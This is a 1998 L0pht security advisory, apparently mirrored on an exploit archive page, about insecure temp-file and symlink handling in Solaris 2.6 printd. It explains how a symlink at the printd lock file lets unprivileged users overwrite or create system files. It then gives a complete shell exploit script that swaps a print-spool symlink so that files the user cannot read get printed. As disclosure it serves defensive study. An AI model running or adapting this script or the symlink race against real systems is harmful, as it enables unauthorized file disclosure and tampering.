Solaris 2.6 printd tmpfile problem

Summary
Description:Standard insecure tmpfile hole
Author:Silicosis <sili@l0pht.com>
Compromise:unprivileged users can overwrite and create system files and print files they shouldn't be able to read.
Vulnerable Systems:Solaris 2.6
Date:11 March 1998
Details


Date: Wed, 11 Mar 1998 11:23:44 -0600
From: Aleph One <aleph1@dfw.net>
To: BUGTRAQ@NETSPACE.ORG
Subject: Solaris printd security vulnerability

`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
                        L0pht Security Advisory

      Document:  L0pht Security Advisory
    URL Origin:  http://www.l0pht.com/advisories.html
  Release Date:  February 23, 1998
   Application:  printd (lp)
 Operating Sys:  Solaris 2.6
      Severity:  Users can overwrite/create system files
                 Users can print unreadable files
        Author:  silicosis <sili@l0pht.com>
  Patch Status:  Sun has been made aware of the vulnerabilities
                 3 weeks ago and still has not released a patch.

`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`

Create/Overwrite Files:

Sun hasn't learned from it's past mistakes; temp files are still a
problem this time it's with  'printd' (lp).   Upon printing a large file
that sits in the queue for ~1minute, a lock file (/tmp/.printd.lock) is
created.  Before you print something large, create a symlink pointing to
the /tmp/.printd.lock towards something you'd like to create/overwrite.

When printd is done, the file your pointing to will have mode 640, and
the contents will contain printd's pid.


``````````````````````````

Printing unreadable files:


Sun has restructured their print spooling in Solaris 2.6. They've
gone over to a queueing system that's similar to sendmail:

[~]lp .tcshrc
[~]ls -al /var/spool/print
total 12
drwxr-xr-x   2 root     lp           512 Feb 20 12:44 .
drwxrwxr-x  10 root     bin          512 Feb 17 11:28 ..
-rw-rw-r--   1 root     staff          4 Feb 20 12:44 .seq
-rw-r-----   1 root     staff         80 Feb 20 12:44 cfA037core
lrwxrwxrwx   1 root     staff         19 Feb 20 12:44 dfA037core ->
/home/sili/.tcshrc
-rw-r-----   1 root     staff         23 Feb 20 12:44 xfA037core

You have your control, transfer and datafiles. The datafile is just
a symlink to the file you printed, so if you link the file you printed
to something else *before* the queue is flushed, printd will print it.

A simple exploit script:

----[CUT HERE: sol26lp]----

#!/bin/sh
#
#Print unreadable files on solaris2.6
#sili@l0pht.com
#
# --If it didn't work, change $BIGFILE to
#   something bigger.
#
# --Script usually works 80% of the time..
#   Didn't work? Try again.. Throw something
#   at the printspooler to slow it down.
#

TMPFILE="./.dmlr"
BIGFILE="/usr/lib/libc.so.1"

if [ $# != 1 ]; then
        echo "Usage:"
        echo
        echo "./sol26lp <file>"
        echo
        echo "Print unreadable files on Solaris2.6"
        echo "                  ----sili@l0pht.com"
       exit 1
fi

echo "Need a large file to print, using $BIGFILE."
cp /usr/bin/vi $TMPFILE ; chmod 700 $TMPFILE
lp $TMPFILE ;
#sleep 1;

rm $TMPFILE ; ln -s $1 $TMPFILE

QF=`ls -al /var/spool/print |grep $TMPFILE |awk '{print $9}'`

echo "Queue File: /var/spool/print/$QF"

while [ -h /var/spool/print/$QF ]; do
        echo "Waiting for file to print";
        sleep 1;
done

echo "File printed. Erasing temp files."
rm $TMPFILE

echo "Done."
echo
echo " --sili@l0pht.com 1/20/98"

----[CUT HERE: sol26lp]----

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]